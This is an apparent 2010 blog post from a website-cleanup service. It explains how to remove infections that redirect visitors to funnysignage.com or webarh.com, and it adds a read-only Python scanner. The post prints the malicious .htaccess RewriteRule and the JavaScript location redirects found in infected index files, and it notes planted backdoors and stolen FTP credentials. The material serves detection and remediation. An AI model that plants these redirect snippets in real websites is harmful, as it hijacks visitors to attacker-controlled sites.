Funnysignage.com and webarh.com website infections

Since this past weekend, 10-9-2010, we’ve been getting many requests from website owners who have had their websites infected with code that redirects visitors to either funnysignage.com or webarh.com. This blog post will show how to clean websites infected with the funnysignage.com or webarh.com redirects.

We’ve cleaned infected websites on Windows servers as well as infected websites on Linux servers and they’ve all been basically the same.

Inside of every folder there is a file named .htaccess. Yes even on Windows. It doesn’t work on websites based on Windows servers, but it’s there. The file contents look like this:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://funnysignage.com/r.php

For those of you who are infected with the webarh.com redirect, your file contents will look similar, just replace funnysignage.com with webarh.com.

Look in all folders for this file. Open it, and if the contents look like the above, delete the file.

You might also find that the index.html files have been replaced, or in some instances, there is an index.html file added to each folder on the website. In any case, you’ll probably find this code somewhere in the index.html file:

(opening script tag)document.location.href='http://funnysignage.com/r.php';(closing script tag)(opening script tag)document.location.href='http://funnysignage.com/r.php';(closing script tag)

You’re reading that correctly. It usually appears twice – and it’s usually at the bottom of the file, outside the closing html tag. Again, for those who have websites infected with the webarh.com redirect, just replace funnysignage.com with webarh.com and that’s what you’ll probably see inside your index.html files.

In many of these website infections, the index.php files will have been replaced. The contents of the replaced index.php file are nothing more than:

(opening script tag)document.location.href='http://funnysignage.com/r.php';(closing script tag)

Removing the above will stop your website from redirecting. However, the clean-up isn’t over. In the majority of the cases with the funnysignage.com or webarh.com redirects, we’re also seeing many backdoors placed on the infected websites.
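The following read-only scanner is an added example, not code from the original post. It walks a web root and reports the three redirect artifacts described above, separating index files that were replaced outright from those that only had the redirect appended. The names `scan_webroot` and `classify` are hypothetical, and it assumes the "(opening script tag)" and "(closing script tag)" placeholders stand for `<script>` and `</script>`. It does not find backdoors.

```python
import os
import re

# Domains named in this post.
HOSTS = "|".join(re.escape(d) for d in ("funnysignage.com", "webarh.com"))

# .htaccess: a RewriteRule whose target is one of the redirect domains.
HTACCESS_RE = re.compile(
    r"^\s*RewriteRule\s+\S+\s+https?://(?:www\.)?(?:%s)\b" % HOSTS,
    re.IGNORECASE | re.MULTILINE)

# Index files: a script block that only sets document.location.href to the domain.
# Assumption: the page's script-tag placeholders stand for <script> and </script>.
SCRIPT_RE = re.compile(
    r"<script[^>]*>\s*document\s*\.\s*location\s*\.\s*href\s*=\s*"
    r"['\"]https?://(?:www\.)?(?:%s)\b[^'\"]*['\"]\s*;?\s*</script>" % HOSTS,
    re.IGNORECASE)

INDEX_NAMES = {"index.html", "index.php"}


def classify(name, text):
    """Return a finding label for one file's contents, or None if it looks clean."""
    lower = name.lower()
    if lower == ".htaccess":
        return "htaccess-redirect" if HTACCESS_RE.search(text) else None
    if lower in INDEX_NAMES and SCRIPT_RE.search(text):
        # Nothing left after removing the redirect means the file was replaced
        # outright and has to come from a backup; otherwise it was appended to.
        leftover = SCRIPT_RE.sub("", text).strip()
        return "index-appended" if leftover else "index-replaced"
    return None


def scan_webroot(root):
    """Walk root and return sorted (relative_path, label) pairs. Read-only."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != ".htaccess" and name.lower() not in INDEX_NAMES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    label = classify(name, fh.read())
            except OSError:
                label = "unreadable"
            if label:
                findings.append((os.path.relpath(path, root), label))
    return sorted(findings)
```

Files labelled `index-replaced` hold no original content and have to be restored from a known good back-up; `index-appended` files still contain the legitimate page with the redirect added to it.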

Unfortunately, there are no common strings to search for when looking for backdoors, but you must find and delete them. Otherwise the next website infection will surely find your site as a victim.

If you have a known, good back-up of your website, you may want to consider deleting your entire site and restoring from back-up. Please verify that the back-up is not infected.

In cleaning up from this infection, you’ll have to remove many, many files. As stated above, the legitimate files are often replaced with nothing more than the above redirect code, so restoring from back-up may be your only choice.

If this infection starts infecting websites hosted at certain hosting providers and somebody starts blaming a particular large hosting provider or providers, don’t believe it. We’ve already seen this infection across many, many different hosting providers and on some sites that are on their own dedicated server. Please do not think that changing hosting providers will solve this issue.

As best we can tell, the only common factors in the funnysignage.com or webarh.com infections are that either the site is running on PHP 4.X, or the website owner, developer, author or someone else who has FTP access to the infected website has a virus that has stolen the FTP credentials.

If you need help in cleaning your website from this, please contact me at: traef@wewatchyourwebsite.com.